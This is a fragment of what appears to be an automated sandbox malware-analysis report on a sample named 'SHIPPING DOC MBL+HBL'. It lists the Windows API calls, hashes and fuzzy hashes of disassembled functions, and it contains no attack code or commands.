                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: 26ca64d4e101500e996b7eedefe281eff962ed5cf0796f5f2a1228b3d37b55dd
                    • Instruction ID: 63e0f85504ecb72be3fc81e464234a385a12e30fd60ac74a874fef1ccda46412
                    • Opcode Fuzzy Hash: 26ca64d4e101500e996b7eedefe281eff962ed5cf0796f5f2a1228b3d37b55dd
                    • Instruction Fuzzy Hash: 5A0162F2940208BFE711ABA1DD89EE7776CEB08301F0005A5F709F2151EA749E898BB0
                    Function 00E8D4A8 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • GetSystemMetrics.USER32(0000000F), ref: 00E8D4E6
                    • GetSystemMetrics.USER32(0000000F), ref: 00E8D506
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E8D741
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E8D75F
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E8D780
                    • ShowWindow.USER32(00000003,00000000), ref: 00E8D79F
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00E8D7C4
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E8D7E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: 9c78382b0dc236520007a43add7f77e9afc3bdde62e5e881e187bd86788f0ed0
                    • Instruction ID: 7abf6b21a25ae5b2b519aaafcf5e491257e70f0bbfea3a5185b6764dbcea8c17
                    • Opcode Fuzzy Hash: 9c78382b0dc236520007a43add7f77e9afc3bdde62e5e881e187bd86788f0ed0
                    • Instruction Fuzzy Hash: 17B1BC31604219EFDF18DF29C9C5BAD7BB1FF04715F08906AEC4CAA295E731A990DB90
                    Function 00E02A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C347,00000004,00000000,00000000,00000000), ref: 00E02ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E3C347,00000004,00000000,00000000,00000000,000000FF), ref: 00E02B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E3C347,00000004,00000000,00000000,00000000), ref: 00E3C39A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C347,00000004,00000000,00000000,00000000), ref: 00E3C406
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 3d815fb6bb9d745eb0aec6a558b4af2e4009c5179c1a24f13a1ef91618e9799c
                    • Instruction ID: 7a4204f0384c3316b1ecdb8a30ee2c822629bfebef6aca5c7b80e9cbb4545482
                    • Opcode Fuzzy Hash: 3d815fb6bb9d745eb0aec6a558b4af2e4009c5179c1a24f13a1ef91618e9799c
                    • Instruction Fuzzy Hash: 4341FB313046809EDB358B298C8CBAB7BF1AB55308F24E45DE247B65E0CA75E8C5D711
                    Function 00E6716F Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E67186
                      • Part of subcall function 00E20F36: std::exception::exception.LIBCMT ref: 00E20F6C
                      • Part of subcall function 00E20F36: __CxxThrowException@8.LIBCMT ref: 00E20F81
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E671BD
                    • EnterCriticalSection.KERNEL32(?), ref: 00E671D9
                    • _memmove.LIBCMT ref: 00E67227
                    • _memmove.LIBCMT ref: 00E67244
                    • LeaveCriticalSection.KERNEL32(?), ref: 00E67253
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E67268
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E67287
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: efe19afdb93d49056ba0811b3dedfb93851ef876e616d953e77747997053861c
                    • Instruction ID: 68450f3b950960b5d269a3b630dc0f897adbd6fbe068363597e306e5280a4bc2
                    • Opcode Fuzzy Hash: efe19afdb93d49056ba0811b3dedfb93851ef876e616d953e77747997053861c
                    • Instruction Fuzzy Hash: 8C319E71A00215EFDB10DFA5ED85AAA7BB8EF44710F1441A5F904BB296D7309E14CBA0
                    Function 00E86205 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00E8621D
                    • GetDC.USER32(00000000), ref: 00E86225
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E86230
                    • ReleaseDC.USER32(00000000,00000000), ref: 00E8623C
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E86278
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E86289
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E8905C,?,?,000000FF,00000000,?,000000FF,?), ref: 00E862C3
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E862E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: d60dd52dceeb58034a7dfe5af4760f654ca04d5d79752674045083029aee354a
                    • Instruction ID: 42f2aca669fbf54108b44a88823cf1df0bbfb24fc8fcb1171aff1777bf9cbf4a
                    • Opcode Fuzzy Hash: d60dd52dceeb58034a7dfe5af4760f654ca04d5d79752674045083029aee354a
                    • Instruction Fuzzy Hash: 0F319F72201210BFEB119F51DC4AFEA3BA9EF09715F040065FE0CAA2A2D6759C45CBA4
                    Function 00E6EBAF Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                      • Part of subcall function 00E1FE06: _wcscpy.LIBCMT ref: 00E1FE29
                    • _wcstok.LIBCMT ref: 00E6ED20
                    • _wcscpy.LIBCMT ref: 00E6EDAF
                    • _memset.LIBCMT ref: 00E6EDE2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: 7ac9658cac698275e07145477ab3a16d4dcf4cf83e96c840c38e66a8e0b2cbf4
                    • Instruction ID: ce185d894ddd2e468586b8315601b466977b11c87e21d6e4e04f4baf1f697200
                    • Opcode Fuzzy Hash: 7ac9658cac698275e07145477ab3a16d4dcf4cf83e96c840c38e66a8e0b2cbf4
                    • Instruction Fuzzy Hash: 71C17E756083019FD724EF24D885A5AB7E4BF84354F04692DF899A73E2DB30ED85CB82
                    Function 00E01424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e04e3d1bd52ce2f963faacf1eaead54e2bf15e7b1ec3032589af1da6e3ee0054
                    • Instruction ID: f3907bc65d456a2071d3d112a0a649b075a63d0cba0bf7d07dee927f228b7754
                    • Opcode Fuzzy Hash: e04e3d1bd52ce2f963faacf1eaead54e2bf15e7b1ec3032589af1da6e3ee0054
                    • Instruction Fuzzy Hash: 72715F30900119EFCB15DF99CC89ABEBB79FF85314F148199F915BA291C734AA91CF60
                    Function 00E76C8C Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bbff9f4f0407c090a58fa838d11cdbeffa9016985d9f25855bf8bf169e0807d1
                    • Instruction ID: c7582e4f4ba72301ce6fb76f0147a22456db47d4255f047dfada608c66e8c658
                    • Opcode Fuzzy Hash: bbff9f4f0407c090a58fa838d11cdbeffa9016985d9f25855bf8bf169e0807d1
                    • Instruction Fuzzy Hash: A561AE31604700ABD714EF24CC85E6FB7E9EB84718F14A919F599B72D2DB30AE44CB92
                    Function 00E8B385 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindow.USER32(00FC5FB0), ref: 00E8B41F
                    • IsWindowEnabled.USER32(00FC5FB0), ref: 00E8B42B
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E8B50F
                    • SendMessageW.USER32(00FC5FB0,000000B0,?,?), ref: 00E8B546
                    • IsDlgButtonChecked.USER32(?,?), ref: 00E8B583
                    • GetWindowLongW.USER32(00FC5FB0,000000EC), ref: 00E8B5A5
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E8B5BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: bc8a2a167443a8cde7f34cb8527c3dabf0808cc88a3d67b993431f509479da9b
                    • Instruction ID: 4720e61eb0d10cb48a8e4f0c6b152c51e702f553b3831f63695d809fffba52a2
                    • Opcode Fuzzy Hash: bc8a2a167443a8cde7f34cb8527c3dabf0808cc88a3d67b993431f509479da9b
                    • Instruction Fuzzy Hash: E371E034600604EFDB30AF55C896FAA7BB5EF09304F145069F96DB72A2D732AC85DB50
                    Function 00E7F532 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E7F55C
                    • _memset.LIBCMT ref: 00E7F625
                    • ShellExecuteExW.SHELL32(?), ref: 00E7F66A
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                      • Part of subcall function 00E1FE06: _wcscpy.LIBCMT ref: 00E1FE29
                    • GetProcessId.KERNEL32(00000000), ref: 00E7F6E1
                    • CloseHandle.KERNEL32(00000000), ref: 00E7F710
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: babe7abb31d4c83a118ffd721afdb30a17767b0c9f788a5b830252cf9d6fd854
                    • Instruction ID: fc1680c0a34a9de27abdd43b53d58980097b32a6d2c8e2a8ad29587838a30b34
                    • Opcode Fuzzy Hash: babe7abb31d4c83a118ffd721afdb30a17767b0c9f788a5b830252cf9d6fd854
                    • Instruction Fuzzy Hash: 35615F75A00619DFCB14DF94C5819AEBBF5FF48314F149469E85ABB3A2CB30AD41CB90
                    Function 00E6127E Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 00E612BD
                    • GetKeyboardState.USER32(?), ref: 00E612D2
                    • SetKeyboardState.USER32(?), ref: 00E61333
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E61361
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E61380
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E613C6
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E613E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 7a37ddd72d2ef895ad7b7b0f47a4bc2ee7463f99e252cfba6409eb2ff47999dc
                    • Instruction ID: b30bf3fdde7bd3f58886fe3cf31b6c1adc626d6810dbfc6eff5e82a41119d4b2
                    • Opcode Fuzzy Hash: 7a37ddd72d2ef895ad7b7b0f47a4bc2ee7463f99e252cfba6409eb2ff47999dc
                    • Instruction Fuzzy Hash: 435106A09847D13EFB3342349C45BBABEE95B06388F0C65C9E0D6668C2C6D89CC4E751
                    Function 00E61097 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(00000000), ref: 00E610D6
                    • GetKeyboardState.USER32(?), ref: 00E610EB
                    • SetKeyboardState.USER32(?), ref: 00E6114C
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E61178
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E61195
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E611D9
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E611FA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
                    • Instruction ID: dc352e4c369b409def19a0b36e159e74bb1ae7b70ef5e69d8437469e0a00062e
                    • Opcode Fuzzy Hash: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
                    • Instruction Fuzzy Hash: 135159A05857D53DFB3383349C55BB6BEE95B06384F0CA5C9E1D5A68C2C294EC88E750
                    Function 00E656A4 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: 4d853ee07b67366ae1e97638a11108d5944fd882eb031f01dc78baebc991aa77
                    • Instruction ID: b30deaf4e88fe65f22d7f896a20e25309e225fbcfeafd83392d1326d81d9e175
                    • Opcode Fuzzy Hash: 4d853ee07b67366ae1e97638a11108d5944fd882eb031f01dc78baebc991aa77
                    • Instruction Fuzzy Hash: C041A1B6D20624B5CF11EBB4B8469DFB7B89F05310F10A866F918F3162E638A744C7A5
                    Function 00E5D87B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D8E3
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E5D919
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E5D92A
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E5D9AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: ,,$DllGetClassObject
                    • API String ID: 753597075-2867008933
                    • Opcode ID: ee79ca4ba313095c8ae1c317a88c2c889131caa3c92243035139ddfdc1fee35e
                    • Instruction ID: f1d070643ae454bcffd505ad03362c4bf7ee20673866cdb98e3bd820d90da02d
                    • Opcode Fuzzy Hash: ee79ca4ba313095c8ae1c317a88c2c889131caa3c92243035139ddfdc1fee35e
                    • Instruction Fuzzy Hash: 9F41B271604204EFDB24DF51CCC4A9A7BB9EF85306F1094A9ED05AF206D7B0DD48CBA0
                    Function 00E636B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E646AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E636DB,?), ref: 00E646CC
                      • Part of subcall function 00E646AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E636DB,?), ref: 00E646E5
                    • lstrcmpiW.KERNEL32(?,?), ref: 00E636FB
                    • _wcscmp.LIBCMT ref: 00E63717
                    • MoveFileW.KERNEL32(?,?), ref: 00E6372F
                    • _wcscat.LIBCMT ref: 00E63777
                    • SHFileOperationW.SHELL32(?), ref: 00E637E3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 4894391b781be8d20ac48ccaf179a3943cadae42e9adb4ab9ff29ecd496a2404
                    • Instruction ID: 9fd96dc0baec959689429392d32e290474f0d6ced857a62ef2e208d0be586ee7
                    • Opcode Fuzzy Hash: 4894391b781be8d20ac48ccaf179a3943cadae42e9adb4ab9ff29ecd496a2404
                    • Instruction Fuzzy Hash: C74191B2548345AED751EF64E441ADFB7E8EF89380F00292EB489E3151EA34E788C756
                    Function 00E872C3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E872DC
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87383
                    • IsMenu.USER32(?), ref: 00E8739B
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E873E3
                    • DrawMenuBar.USER32 ref: 00E873F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
